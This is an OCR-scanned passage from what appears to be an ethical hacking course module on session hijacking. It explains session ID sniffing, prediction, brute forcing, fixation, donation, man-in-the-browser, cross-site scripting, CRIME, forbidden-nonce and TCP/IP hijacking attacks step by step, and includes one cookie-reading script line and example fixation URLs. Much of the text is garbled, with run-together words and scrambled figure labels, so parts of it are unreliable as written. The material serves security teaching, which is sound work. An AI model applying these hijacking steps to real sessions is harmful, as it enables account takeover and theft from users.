contrast, active hijacking eclipses a pre-existing session. As a resultof this attack, a legitimate
user mayloseaccessor the normalfunctionality of their established
Telnets essionbecausea n
attackerhijacks the session and acts with the user'sprivileges. Becausemost authentication
mechanisms are enforced onlyat the initiation of a session,theattackercan gain accessto a
targetmachinewithoutauthenticationwhilea session is i n progress.
Anothermethodis to use source routed IP packets.
Thistypeof MITM attackallowsan attacker
to becomea partof the target-host conversation bydeceptivelyguidingIP packetsto pass
throughtheir system.
Sessionhijackingis the process of taking over an existingactive session. An attackerrelies on a
legitimate
user to makea connection andauthenticate.Session hijacking is more difficultthan
spoofing.
IP address In session hijacking, John(anattacker) wouldseekto insert himselfinto a
sessionthat James (2legitimate user)already had set up with \\Mail. Johnwould wait until
Jamesestablishes a session,displace Jamesfromthe established session bysome means, such
as a DoSattack, and thenpickup the sessionas though he were James.Subsequently, John
send a scripted
‘would set of packets to \\Mail andobservethe responses.For this purpose,
Johnneedsto knowthesequence
sequencenumber,
process,
in
number use whenhe hijacked
he must knowthe ISNandthe numberof packets the
thesession.Tocalculate
involvedi n the exchange
sessionhijacking
Successful is difficultwithoutthe useof knowntoolsandis only possible when
severalfactorsare underthe attacker'scontrol. Knowledge of the ISN is the leastof John’s
Forinstance,
challenges.
a
Johnneeds methodto displace
as a methodto knowthe exact status of James's
BoththesetasksrequireJohnto havefarmore knowledge
James
from
the
active sessionas well
session at the moment that Jamesis displaced
and controlover the sessionthan
wouldnormally be possible.
However, spoofing
IP address attackscan onlybesuccessful
if an attackeruses IP addresses for
authentication.They cannot perform IP addressspoofingor session hijacking if per-packet
integritycheckingis executed.In the same manner, IP addressspoofing or session hijacking is
possible
‘not ifthe sessionusesencryption methodssuchasSecureSockets Layer (SSL) or Point-
to-Point Tunneling Protocol(PPTP). Consequently,the attackercannot participate i n the key
exchange.
ical andCountermensores
Mackin ©by E-Comel
Copyright
James
(Victim)
og Server
John (Attacker)
11.5:Spoofing
Figure attack
togs
James o n to the
withhiscredentials
server
<
Predictthe |
James and kills
sequence
(vietim) James’
connection
John (Attacker)
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
[NetworkLevel So
01 Session Hijacking
Concepts ijeckng
= Application
Level 5
02 ijacking
05 Countermeasures
Application
Level Session Hijacking
|G. Ina session hijacking
attack, session
3 token stolenora val seston tokenis rected to gainunauthorized
sifing
Session
{A sossion tokencan be compromised
in various
Prasictable
ways
session token
[Map-n-the-middle
attack ‘Man-in-the-browser
attack
Crosssitscripting
(SS)attack Crosssite forgeryattack
request
Sessionreplay
attack Sesson fuatonattack
CRIME
stack Forbidden
atack
Level SessionHijacking
Application
In application
level hijacking,
the attackerobtains the session IDs to gain control over an
s essionor to create a new unauthorized
existing application
s ession,Thissection discusses level
sessionhijacking
and various methodsto compromise the session token,
suchas session
sniffing
andthe use of predictable
sessiontokens.
ical andCountermensores
Mackin ©by E-Comel
Copyright
In application
levelsession hijacking,an attackerstealsor predicts a validsession to gain
unauthorizedaccess to a web server. Usually, networklevel and application level session
hijacking
occur together becausea successful networklevelsessionhijack provides an attacker
with ampleinformationto perform applicationlevel session hijacking.
Applicationlevel session
hijacking
relieson HTTPsessions.
attackerimplements
‘An various techniques suchas stealing,guessing,and brute forcing to
a
obtain valid session ID,whichhelps
progress. control
i n acquiring
a over valid user's session whileitis i n
alsouse sniffing
‘can of
sessionIDsor memorycontents either the user’s systemor the server. Theattacker
toolssuchas Wiresharkor SteelCentral PacketAnalyzer
trafficbetweentheclientandserver to extract the sessionIDsfromthe packets.
to sniffthe
Guessing:
An attackerattemptsto guessthe session IDsbyobserving
session variables.
In the case of sessionhijacking,
the rangeof sessionID valuesthat can beguessedis
limited.Thus, guessingtechniques
are effectiveonlywhenservers use weakor flawed
session-IDgeneration mechanisms.
Brute forcing: In the brute-force technique, an attacker obtainssession IDs by
attemptingall possible
permutations of session IDvaluesuntil finding
one that works.An
attackerusinga digitalsubscriberline(DSL) up to 1,000sessionIDsper
can generate
second.Thistechnique is most usefulwhenthe algorithm that produces session IDsis
‘non-random,
com)
itp:/iwewew.mopsite.
view/WW/80422101520008
Ietp//wwen.mysite.com/viw/VW/30822101522507
Figure117:Brte-forcing
attackontheSesion IDof user
shownin the abovefigure,
‘As a legitimate user connects to a server with session ID
\vw30422101522507. Employing various combinations suchasVW30422101518909 and
\vw30422101520803, an attackerattempts to bruteforcethe session ID i n the hopeof
arriving at the correct session ID. Oncethe attackerobtainsthe correct
eventually
ical andCountermensores
Mackin ©by E-Comel
Copyright
sessionID,they
gaincomplete
accessto dataandcan perform
the user’s operations
on
behalfof the legitimate
user.
A
predicted
of
range values
small
for a sessionID is very
session token can be compromisedi n various ways:
=
session
Predictable
(MITM)
attack
Man-in-the-middle
Session
fixation
token
CRIME
attackattack
=
Cross-site
attack Forbidden
Man-in-the-browser
(XSS)
scripting attack Session
attack
donationattack
forgery
Cross-siterequest attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionIDs using Sniffing
Compromising and byPredicting
SessionToken
Session by Session
Compromising
‘ering
Sniffing Session IDs Compromising
Predicting
IDs
Token
aval can
(©Anattackerutes a snr to capture session
tokenor session 0
tacks predict
sesion Ds generated
lgorthmsandimpersonate
a website
user
byWeak
(©
tain unauthorized Ds
T e attackerthenuses thevalid
token sessionto
acess tothewebserver
‘tacks
aaah ale
variablesectionsof
analyte
on
sion to
bert ‘The
analysis
i s performed
cyplanalytc
tools,
manualy various
or using
IDsto gather
Session samples
inthesare tine
‘window
andkeepthevariable
constant
SessionIDs Using
Compromising Sniffing
web server identifiesa user'sconnection through
‘A a unique session ID (also
knownas a
session token).
Thewebserver sendsa sessiontokento theclientbrowser
afterthesuccessful
the body
of
authentication client login. Usually,
of an HTTPrequisition.
a sessiontokencomprises
a stringof variablewidththat
(cookie),
is usefuli n various ways,suchas i n the headerof an HTTPrequisition i n a URL,
or i n
attackeruses
‘An packet
sniffing PacketAnalyzer
toolssuchas Wiresharkand SteelCentral to
intercept thenanalyzes
theHTTPtrafficbetweena victim andwebserver. Theattacker the data
inthe captured packets to identify
valuableinformationsuchas session IDsand passwords.
Oncethe session ID is determined, the attackermasquerades as the victim and sendsthe
sessionIDto theweb server beforethe victim does.Theattackerusesthevalidtokensessionto
gain unauthorizedaccess to the web server. In this manner, the attackertakescontrolover an
existing
session.
legitimate
Figure
11.8:Prediction
of session 10by sniffing
ical andCountermensores
Mackin ©by E-Comel
Copyright
Compromising SessionIDs byPredicting SessionToken
Asession ID is tagged
possible.
as proof
Sessionprediction
of an authenticatedsession established
server. Thus,if an attackercan guessor
predict
betweena user
the sessionID of the user, fraudulent
enablesan attackerto bypass
andweb
activityi s
the authenticationschemaof an
application.Usually,attackersc an predictsession IDs generated byweak algorithms and
impersonate a websiteuser. Attackersanalyzea variablesection of session IDsto determine
the existence of a pattern.This analysis
is performed eithermanually or byusingvarious
cryptanalytic
tools.
high
attackercollecta
‘An numberof simultaneous session IDs to gather samples
i n the same
time windowandkeep the variable the attackercollectssome validsessionIDs
constant. First,
that are usefulin identifying authenticatedusers. Theattackerthen studiesthe session ID
structure,the information usedto generate it, and the algorithm usedbythe web application
to secure it. From thesefindings,
attacker
the can predict the session ID.
Attackerscan alsoguesssession IDs byusinga brute-forcetechnique, i n whichthey
generate
andtest differentsessionIDvaluesuntil theysucceed
i n gainingaccessto the application,
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Predicta SessionToken
(©Mostwebservers
(©
An attacker
use
theunique
guesses
custom
algorithms
the
ora
valueoF deduces
session
predefined
patter
session 1 0to hijack
the session
Snel
Captures
sever
Anattacarcoptures
fevioniDsandanaaesthe
mm
|| netp:/ encefLadhacher.con/viaw/JOEX18082019152020
REED:
BEED=//eww
np oee
Som/visw/ @0e2019153020
com/visw/Snexigoez019160020
Som/viw/onsxlaoez0i9i64020
Predicts
1 16:2555on August 23,201
the attacker can successtlly
com/vtew/J82%23082019162555,
eep://smme.cortstsedhacker
rede he sesion 1D
Embedding
hidden
field, HTTP’s
in a
command
formas a whichis submittedto the POST
‘=
Embedding
cookies
the
client’s
in
Anattackerguesses
on localmachine
the uniquesessionvalueor deducesthe sessionIDto hijackthe session.AS
showni n the below figure,an attackerfirst capturesseveralsession IDs and analyzesthe
pattern,
http://www.
http://www. .com/view/JBEX180
certifiedhacker
http://www.certifiedhacker
.com/view/JBEX180
certifiedhacker .com/view/JBEX18082019160020
http://www.certifiedhacker
.com/view/JBEX180 Constant Date Time.
gue 11.9 Sample
sessions by
captured an attacker
Module8 1294
Page ical andCountermensores
Mackin Copyright
by E-Comel
©
Onanalyzing successfully
23,2019,theattacker
the pattern,at 16:25:55on August
session ID,as shownin the belowfigure.
predicts
the
http://www.certifiedhacker .com/view/JBEX23082019162555
Constant Date Time
11.10Session
Figure
Now,theattackercan mount an attackthrough
IOpredicted
bythe
the following
steps.
attacker
The attackeracquiresthe current session IDandconnectsto theweb application.
=
Theattackerimplements technique
a brute-force or calculates
the next session ID.
‘=
Theattackermodifiesthe current value i n the cookie/URU/hidden
form field and
assumesthe next user'sidentity.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionIDs Using
Compromising Man-in-the-Middle Attack
\© Themann-the-midale
attacksuse to intrudeInto an existing
connection andinte
betweensystems
being
themessages exchanged
| the TCP
After
sttackercan
ofthe connection,
nercepton an
rad, most,andinser froudlent
|
case
the
and
inthe ofantp transaction,
between cet
Connection
theTCP
theserver
SessionIDs Using
Compromising Man-in-the-MiddleAttack
‘A
man-in-the-middle (MITM) attackis used to intrude into a n existingconnection between
systems andto intercept messages being transmitted.In this attack,attackers
u se different
techniques andsplita TCPconnectioninto two: a client-to-attackerconnection andan attacker-
to-server connection.After the successful interceptionof a TCP connection,an attacker can
read,modify, and insert fraudulentdata into the interceptedcommunication.In the case of an
HTTPtransaction,the TCPconnection betweentheclientandserver is the target.
Gient-to-s
1.
Figure 11.11:
of
Prelietion session
1D sing a manin-the-midle (MIT) attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionIDs Using
Compromising Man-in-the-BrowserAttack
©Itsmain objective
is to cause financial bymanipulating
deceptions transactions
of internetbankingsystems
Steps
to Perform Man-in-the-Browser Attack
Compromising
SessionIDs UsingMan-in-the-BrowserAttack
attackis similarto
A man-in-the-browser MITM attack.Thedifference
an betweenthe two is
that a man-in-the-browser
attack uses Trojanhorseto interceptand manipulate
a calls
betweena
browser
installedTrojanand its securitymechanisms or libraries.An attackerpositions
betweenthe browserand its security
pagesandtransaction content or insert additional
‘web
mechanism, andthe Trojan
a previously
can modify
transactions.AlloftheTrojan’s
activities
are
to web
invisible boththe user and application.
ical andCountermensores ©
Mackin by E-Comel
Copyright
The main objective of thisattack is financial
theft bymanipulatingtransactions made using
Internet banking systems.A man-in-the-browser attackcan succeedeven i n the presence of
security mechanisms suchas SSL,public keyinfrastructure
(PKI),
andtwo-factor authentication
because all the expected
controlsandsecurity mechanisms wouldseem to functionnormally.
to PerformMan-in-the-Browser
Steps Attack:
‘=
=
The
Trojan
first
infects software
computer's
or
application).
the
The Trojaninstallsmalicious
(OS
files)and saves it
code (extension in the browser
configuration.
the maliciouscodei n the formof extension files is
After the user restarts the browser,
loaded.
a handlerfor every visit to a webpage.
Theextensionfilesregister
the extension matchesi ts URLwith a listof knownsitestargeted
Whena pageis loaded,
for
attack
Theuser logs
i n securely
to thewebsite.
a button event handlerwhena specific
Theextension registers pageload is detected
pattern
itwith list.
witha specific andcompares its targeted
Whenthe user clickson the button, the extension uses the DocumentObjectMode!
{DOM)interfaceandextracts all thedatafromallformfieldsandmodifiesthe values.
Thebrowser sendsthe formandmodified valuesto theserver.
Theserver receives the modified
valuesbut cannot distinguish
betweenthe original
and
modifiedvalues.
Aftertheserver performs thetransaction,a receiptis generated,
Now,thebrowser receives the receipt
forthe modified transaction.
Thebrowserdisplays the receiptwiththe original
details.
Theuser believesthat the original
transaction was receivedbythe server without any
interception.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Compromising
SessionIDs Using
Client-side Attacks
Cross-SitScripting
0X55)
(8
XSs
enables
the web
malicious
attackersto inject
pagesviewedbyotherusers
dientside
seit into
‘Malicious Codes
JavaSeript
anywarning,
fenerate but captures
sexsion tokensithe
andsends
backeround themtotheattacker
Trojans
to sendallthesessions the attacker's machine
through
SessionIDs Using
Compromising Client-sideAttacks
Client-sideattackstargetvulnerabilitiesi n client applications that interact with a malicious
server or processmalicious data.Depending on the nature of vulnerabilities, an attacker can
exploitan application
visitinga maliciouswebsite.
JavaRuntimeEnvironment,
an a
bysendingemailwith maliciouslinkor otherwisetricking
Vulnerableclient-side applications includeunprotected
a user into
websites,
andbrowsers;of these,browsersa re the majortarget.Client-side
attacksoccur whenclientsestablishconnections with maliciousservers andprocess potentially
harmfuldatafromthem.If no interaction occurs betweenthe clientand server, then there is
no scopefor a client-sideattack.One suchexample is runninga FileTransferProtocol(FTP)
clientwithout establishing
applicationis configured
it susceptible
a
connection to an FTPserver. In the case of instant messaging,
i n sucha way that it makes
to client-side attacks.Thefollowing client-sideattackscan beusedto compromise
the
clientsto logi n to a remote server, making
session IDs.
*
scripting(XSS):
Cross-site XSSenablesattackersto injectmaliciousclient-sidescripts
into web pagesviewedbyother users.
JavaScript
‘Malicious codes:Anattackerc an embedi n a web page a malicious
scriptthat
doesnot generateany warning but captures s essiontokensi n the background and
sendsthemto theattacker.
Trojans:A Trojanhorsecan change
the proxy settings
i n the user’s
browserto sendall
sessionsthroughan attacker’s
machine.
ical andCountermensores
Mackin ©by E-Comel
Copyright
8
Module 1400
Page tical andCountermensores
Making by Comet
Copyright©
Compromising SessionIDsUsing
Client-sideAttacks:
Cross-siteScript
Attack
(Gan
attacker
crafted
sends lnk tothe victim with maiousavaScrp,
bythe atacker whenthevictimchekan the link
the instructionsm ade
theJavaScript
wilrun and complete
SessionIDs Using
Compromising Client-sideAttacks:Cross-siteScript
Attack
A cross-sitescriptattackis a client-sideattacki n whichthe attackercompromises a session
tokenbyusingmalicious codeor programs.Thistypeof attackoccurs whena dynamic web
pagereceives maliciousdatafromtheattackerandexecutesit on theuser'ssystem.
Websites that create dynamic pagesdo not havecontrol over how the clientsread their
output.Thus,attackerscan insert a malicious JavaScript, ActiveX,
VBScript, Hypertext Markup
Language (HTML), or Flashapplet
scripto n the user'smachine
redirectsusers to unexpected
into a vulnerabledynamic
and collectspersonal
page. Thatpage then
information
the
of the user, stealscookies,
web pages,or executesany maliciouscodeon the user'ssystem.
executes
showni n the belowfigure,
‘As a user first establishesa valid session with a server. An attacker
a link
sendscrafted to the victim with
JavaScript
displays
runs automaticallyand performs malicious
JavaScript. Whentheuser clickson the link,the
the instructions set bythe attacker.The result
the current sessionID of the user. Using thesame technique, the attacker can create
specific
JavaScript
codethat fetchesthe user'ssession ID:
<SCRIPT>alert
Thereafter,
(document. cookie);</SCRIPT>
the attackeruses thestolensession ID to establisha validsession with the server,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Compromising SessionIDsUsing Client-sideAttacks:
Cross-siteRequest
Forgery Attack
©.
The Crosesite
Request
to performmalicious
Forgery
activities attack
exploits
(CSRF) thevictim'sactivesession witha trustedsite
<Q AEE
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionIDs Using
Compromising SessionReplay
Attacks
(©Inasession replayatac, the attackerstens to theconversationbetweenthe wer andtheserver and
captures theauthentication
tokenoftheuser
|@ Oncetheauthentication
tokenscapture,the atackerreplays
uthentcationtokenand gansunauthorized
the
access tothe server request
tothe server withthecaptured
SessionIDs Using
Compromising SessionReplay
Attacks
Ina sessionreplay
attack, the authenticationtokenof a user bylistening
the attackercaptures
to.a conversation betweenthe user andserver. Oncethe authenticationtoken is captured, the
attackerreplays the authenticationrequestto the server with the captured authentication
tokento dodge the server; consequently,
theygainunauthorizedaccess to the server. A session
replay
attack
involves
=
following the
Theuser establishes
steps.
a connection withthe web server.
=
Theserver asksthe user forauthenticationinformationas identity proof.
=
Theuser sendsauthenticationtokensto the server. In thisstep,a n attackercaptures
the
authenticationtoken of the user byeavesdropping o n the conversation betweenthe
user andserver.
Oncethe authenticationtoken is captured, the attackerreplays the requestto the
server with the captured authenticationtoken and gainsunauthorizedaccess to the
server
Figure
11.15:
Prediction
of session
ical
2
1Dusingsession replay
attack
andCountermensores
Mackin ©by E-Comel
Copyright
j
SessionIDs Using
Compromising SessionFixation CEH
(©eps aserver
that
lows
aeset
T e atace
awd
hevlnrobityo usa SO
SessionIDs Using
Compromising SessionFixation
Websession security preventsa n attackerfrom intercepting, brute forcing,
or predicting the
sessionID issued bya webserver to a user’s browseras proof of an authenticatedsession
However, this approach ignoresthe possibilityof the attackerissuinga sessionID to the user’s
browser,forcing it to use thechosen s essionID. Thistypeof attackis calleda sessionfixation
attackbecausean attackerfixesthe user'ssession ID in advance, instead
of generating it
randomly at of
the time login
Theattackerperforms a sessionfixationattack to hijacka valid user session.Theattacker
takes
advantage of limitationsi n web-application session ID management. Webapplications allow
the user to authenticate themselves usingan existingsessionID,instead of generating
a new
session ID.In this typeof attack, the attackerprovidesa legitimate web-application
sessionID
andluresthe victim to use it. If thevictim'sbrowseruses that session ID,thenthe attacker can
hijack s essionbecausethe attackeris already
the user-validated aware of the sessionID used
by
the
victim.
{A sessionfixationattackis a kindof session hijack. insteadof stealing
However, the session
establishedbetweena user andweb server afterthe user logs in, a session fixationattackfixes
an establishedsessionon theuser’s
browser; thus,the attackis initiated beforethe user logs in
attackeru sesvarious techniques
‘An to performa sessionfixationattack:
+
+
Session
tokenin the URLargument
Sessionfield
tokenin a hiddenform
+
IDin a cookie
Session
Theattackermust choosea technique
basedon howthe targetweb application usessession
tokens.Theattackerexploits
the vulnerability
of a server that allowsa user to use a fixed
ical andCountermensores
Mackin ©by E-Comel
Copyright
session ID.Then,the attacker provides a valid session ID to a victim and lureshim to
using that session ID.A session fixationattackhasthe following
authenticatethemselves three
phases,
‘=
Sessionset-upphase: In this phase,the attackerfirstobtainsa legitimatesessionID by
establishing
a connection with the target web server. Few web servers supportthe idle
sessiontime-out feature.If the targetweb server supports this feature,the attacker
needsto sendrequests repeatedly to keep the established
trapsession ID alive.
Fixation phase: In this phase, the attackerintroduces the session ID to the victim's
browser,thereby fixingthe session.
‘=
Entrancephase: In this phase, the attackerwaits for the victim to logi n to the target,
webserver usingthetrapsessionIDandthenenters thevictim’s session,
A sessionfixationattackis performed through following
the steps.
‘First,the attackerestablishes a legitimateconnection with the targetweb server.
The targetweb server (eg, http://citibank.com/) issues a session 1D,say
(06441
FEA4496C2, to theattacker.
The attackersendsa link with the establishedsession ID, say http://citibank.com/?
SID=0D6441FEA4496C2, to the victim andluresthe victim to clickon it to access the
website
Thevictim clickson the link,believingit to be a legitimate
link sent bythe bank.This
the server's
‘opens loginpagei n thevictim’s
browserforSID=0D6441FEA4496C2,
Thewebserver checks thatthesessionID0D6441FEA4496C2 established
is already and
is i n a n active state;hence,
it doesnot create the new session.
the victim enters their login
Finally, credentialsi n thelogin
script,andthe server grants
themaccessto the bankaccount.
this point,knowing
‘At the session ID,the attackercan also access the victim'sbank
account via http://citibank.com/?SID=0D6441FEA4496C2.
the sessionID is set bythe attackerbeforethe user logged
Because in, the user can besaidto
havelogged
into theattacker'ssession.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Ro Vietim
Module8 1408
Page ical andCountermensores
Mackin
©
by E-Comel
Copyright
SessionHijacking ProxyServers
Using
(©Anattacker ures
bogus
‘on
a
the vt
link,whichlooks
betredirects
Teptimate theuser
tocick
to
“athe
the egiimate
server on Behaof
thei tm andserves as pronyfor
The
attacker
captures
then
Ingracton ofthe egimate
sever
the
see nee ee
SessionHijacking
Using Servers
Proxy
‘An
attackerluresthe victim to clickon a fake link,whichappears legitimate
but redirectsthe
userto
attacker
theattacker's
captures
server. Theattacker
then forwards
the sessioninformationduring
to the legitimate
therequest server on
behalfof the victim and serves as a proxy for the entire transaction. Acting
a s a proxy, the
the interactionbetweenthe legitimate server
anduser.
hree"ht/fresvoadquys.com/gotchaghp">
“ca
vietim
|
AttackerServer
(reallybadguys.com)
"Sac
iperinie
eavbaoaian Legitimate
Server
amazon.com)
11.17:
Figure Session
hijacking
usingpronyservers
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionHijacking CRIMEAttack
Using
‘ata (CRIME)
attack
that resent
inthe
ompceson Rati nfo Lek MadeEat
festre ofprotocols
compression sich at
a clentlde
SUT, SPDY
a ndT P S
explo thevnerabies
‘The
information
obtained
romcooked
testable
autherlation
sesion
appli thesession anew wth theweb
SessionHijacking CRIMEAttack
Using
Compression
Ratio Info-Leak Made Easy(CRIME)
is a client-sideattack that exploits
vulnerabilities featureof protocols
in the data-compression suchas SSL/Transport Layer
Security
(TLS), SPDY, and HTTPSecure(HTTPS).The possibility
of mitigation
againstHTTPS
compressionis low,which makesthis vulnerabilityeven more dangerous than other
compression vulnerabilities.
When two hostson the Internet establish2 connection using HTTPS, a TLSsession is
established,and the data are transmittedin an encrypted form.Hence, it is difficultfor an
attackerto reador modify the messagesbetweenthe two hosts.Whena user logsinto a web
application,authentication dataare storedin a cookie. Whenever thebrowser sendsa n HTTPS
requestto the webapplication, the storedcookieis usedfor authentication.In this attack,the
attackerattemptsto accesstheauthenticationcookieto hijack the victim’s
session.
In HTTPS, cookies are compressed usinga lossless datacompression algorithm (DEFLATE) and
then encrypted. Hence,it is difficult for an attackerto obtainthe valueof the cookiewith
simple
sniffing,
To perform a CRIMEattack, a n attackermust use socialengineeringtechniques to trick the
victim into clicking
on a malicious link. Whenthe victim clickson the maliciouslink,i t either
injectsmaliciouscodeinto the victim'ssystem or redirects
the victim to a maliciouswebsite. If
the victim hasalready establishedan HTTPS connection with a securedweb application, the
attackersniffsthe victim’sHTTPStrafficusingtechniques suchas ARPspoofing. Through
sniffing,the attackercaptures the cookievaluefromthe HTTPS messagesandsendsmultiple
HTTPSrequests to the web application with that cookieprepended with a few random
characters.Subsequently, the attacker monitors the traffic betweenthe victim and web
application to obtainthe compressed andencrypted value of the cookie.Aftercapturing the
ical andCountermensores
Mackin ©by E-Comel
Copyright
the attacker analyzes
cookie, the cookielengthand predicts
the actual valueof the
authenticationcookie,
After obtainingthe authenticationcookie,
the attackerimpersonates the victim and hijacks
the
session with the secure web application
victim’s to steal confidentialinformationsuchas
passwords, socialsecurity numbers, and credit card numbers.Attackersuse tools suchas
CrimeCheck to detectwhethera web server hasTLSor HTTP compressionenabledandare thus
vulnerableto CRIMEattacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SessionHijacking ForbiddenAttack
Using
(2 Aforbidenattacka typeofmann
(©Ieexpots
thereuse oferptographic
attack
the-midle
during
nonce the TLS
t o ick HTTPS
used
h andshake
s esions
todcovesentive information,
as
such bankaccountu mber, passwords,
andsci ecuty numbers
SessionHijacking UsingForbiddenAttack
Aforbiddenattack typeof MITM attackthat can beexecutedwhena cryptographic
is a nonce is
reusedwhileestablishing
an HTTPSs essionwith a server. According
to the TLSspecification,
thesearbitrarypiecesof data must beusedonce, Thisattackexploits the vulnerability
that the
TLSimplementation incorrectlyreuses the same nonce whendata are encrypted usingthe
Encryption
‘Advanced Standard-Galois/Counter Mode (AES-GCM) duringthe TLShandshake.
Attackersexploitthisvulnerability
to perform an MITM attackbygenerating cryptographic
keys
usedfor authentication.Repeating the same nonce duringthe TLShandshakeallows an
to
attacker monitor andhijack
the protection,
as JavaScript
the
the connection, After hijackingHTTPSsession and bypassing
attackersinjectmaliciouscodeand forged content into the transmission,
code or web fieldsthat promptthe user to disclosepasswords,
such
socialsecurity
numbers, or otherconfidentialinformation. A forbidden attackinvolvesthe followingsteps.
=
Theattackermonitors the connection betweenthe victim andweb server andsniffsthe
nonce fromthe TLShandshake messages.
Theattacker generatesauthentication keys
usingthe nonce andhijacks the connection.
All the trafficbetweenthe victim andweb server flowsthrough theattacker'smachine.
TheattackerinjectsJavaScript code or web fields into the transmission towardsthe
victim,
Thevictim reveals
sensitive information
suchas bankaccount numbers,
passwords,
and
socialsecurity
numbersto theattacker.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
11.19: hijacking
Session
attack
3 forbidden
using
Module8 1412
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
SessionHijacking SessionDonationAttack
Using
In a session donationattack,
theattackerdonatestheir own session IDto the targetuser. In this
attack, firstobtainsa validsessionID bylogging
theattacker into a service and laterfeedsthe
samesessionID to the targetuser. ThissessionID linksa targetuser to the attacker'saccount
pagewithoutdisclosing any informationto thevictim. Whenthetarget user clicks
o n the link
and enters the details (username, password, paymentdetails,etc.)i n a form,the entered
detailsare linkedto the attacker'saccount. To initiate this attack,
the attackercan sendtheir
sessionID usingtechniques suchas cross-sitecooking, an MITM attack,andsessionfixation.A
session donationattack
involvesthe following
steps.
a legitimate
First,the attackerlogsinto a service, establishes connection withthetarget
web server,anddeletesthe storedinformation,
The targetweb server (e.g,http://citibank.com/)
issues a session 1D,say
to theattacker.
(06441FEA4496C2,
The attacker. ~—sthen~—donates_-—stheir_-—
session ID,_—say
ttp:/citibank.com/?SID=006441FEA4496C2,
to the victim andluresthe victim to click
on it to accessthewebsite,
Thevictim clickson the link, believing it to be a legitimate
link sent bythe bank.This
the page
‘opens
the
server's i n victim’s browser with SID=0D6441FEA4496C2.
victim enters theirinformationin the pageandsavesit
Finally,
the
ical andCountermensores
Mackin ©by E-Comel
Copyright
11.20 Session
hijacking
using sesion donation
attack
ModuleFlow
[NetworkLevel So
01 Session Hijacking
Concepts Sues
02 Application
Lavel 5
ijacking
05 Countermeasures
"WD
re
anspor
and
internet
protocol
network ive hacking
inthe apleatonayer
rales
on ijckng usedbywebapplatons
Bd aang
tev gathers
oy
some
information,
he network
toattacktheappleaton
sessions, the tater
levelsssone
tal whichare sed
Blindniseking BDistiacking
BLvor acting ED Man-inshe
mide:
Packet snifer
ical andCountermensores
Mackin ©by E-Comel
Copyright
Network level hijacking relies on hijackingtransportand Internet protocolsused byweb
applicationsi n the applicationlayer.
Byattacking networklevelsessions,the attackergathers
some criticalinformationthat is usedto attackapplication
levels essions.
are differenttypesof networklevelhijacking
Thefollowing
hijacking
UDP
+
+
Blind
hijacking
+
+
RSThijacking
Man-in-the-middle:
packet
sniffer
TCP/IP
+
‘Three-way
hijacking
Handshake
+
IP spoofing:
sourcerouted packets
Initially,
the client-sideconnection is i n the closedstate andthe server-side i n the listening
state. Theclient initiates the connection bysending the initial sequencenumber(ISN) and
settingthe SYNflag. Theclientis now i n the SYN-SENT state.
ical andCountermensores
Mackin ©by E-Comel
Copyright
hijack.
Ifthe attackercan foolthe server into receivingtheirspoofed
packets
and executing
i n hijacking
them,the attackeris successful the session.
Bob
[ACK,
ACKH
7001,S EQ
40021
11.21:Three-way
Figure handshake
three-way
‘The handshake
showni n theabovefigure thefollowing
involves steps.
1. Bobinitiates a connection with the server andsendsa packet
to the server with the SYN
flag
set.
Theserver receives thispacket with theSYN+ ACKflag
andsendsa packet andan initial
sequence number(ISN)for theserver.
Bob sets the ACKflagacknowledging the receiptof the packet
and increments the
sequence numberby1.
4, Thetwo machines havesuccessfully
establisheda session.
the next sequence numberandACKnumberthat Bobwill send,
If the attackercan anticipate
theycan spoof
Bob'saddressandstart communicationwiththeserver.
ical andCountermensores
Mackin ©by E-Comel
Copyright
TCP/IPHijacking
(©:
{© using
TCP/IPjsehng
spoofed
volves
ofa
connection
between
and
communiate
with
connection hangs,
Avietin’s
packets
host's
asthe
atacer
andanatacker
to sete contol
machine
targetmachine
TCP/IP Hijacking
InTCP/IP
hijacking,
an attacker intercepts
an establishedconnection between two
byusingspoofed
parties
communicating packets
andthenpretendsto be one ofthoseparties.
In this approach, the attackeruses spoofed packets to redirectthe TCPtraffic to their own
machine. the victim'sconnection hangs,
Once this is successful, and the attackeris ableto
communicate with the host’s machineon behalfof the victim. To launcha TCP/IP hijacking
attack, both the victim andattackermust be on the same network.Thetarget server andthe
victim machines can belocatedanywhere. Byusingthistechnique, an attackercan easilyattack
systems that use one-time passwords. As illustrated i n the below figure,TCP/IP hijacking
Involvesthe following processes.
The
hacker
sniffs
ISN.
the communication betweenthe victim andhostto obtainthevictim's
using
By
host
system.
sendsa spoofed
thisISN,the attacker fromthe victim’s
packet to the
IPaddress
ical andCountermensores
Mackin ©by E-Comel
Copyright
ea Sar tasreog cn tion
ackingproce
11.22:TCP/IP
Figure
hijacking
‘TCP/IP is performed
through
thefollowing
steps.
=
Theattackersniffsthevictim'sconnection anduses the victim’s
IP addressto senda
spoofedpacket
with the predictedsequencenumber.
the spoofed
The receiver processes packet,increments the sequencenumber,
and
sendsan acknowledgement to thevictim'sIPaddress.
Thevictim machineis unaware of the spoofed
packet.
Therefore,
it ignores the receiver
machine'sACKpacket andturns offsequencenumbercount.
Consequently, with theincorrect sequence
the receiver receives packets number.
The attacker forces the victim's connection with the receiver machineinto a
desynchronized
state.
spoofs
Theattackertrackssequencenumbersand continuously packets
that originate
fromthevictim’s
IPaddress,
Theattackercontinues to communicate with the receiver machine,
whilethe victim’s
connection hangs.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SourceRoutedPackets
IP Spoofing:
achet technique
source routing unauthorized
i usedfor gaining
a
aces to computer
with
by rom
the
hostserver
the
packet
wit number
aeady
ign packet oe a he receives asequence
sed the stacker
IP Spoofing:
SourceRoutedPackets
Sourcerouted packets are usefuli n gaining unauthorizedaccess to a computer with the helpof,
a trustedhost’s IP address. Thistypeof hijack allowsattackers to createtheir own acceptable
packets to insert into a TCPsession.First, an attackerspoofs a trustedhost'sIPaddress s o that
the server managinga sessionwith the hostacceptsthepackets fromtheattacker.Thepackets
are source routed; therefore, the senderspecifies the pathfor packets fromthe source to the
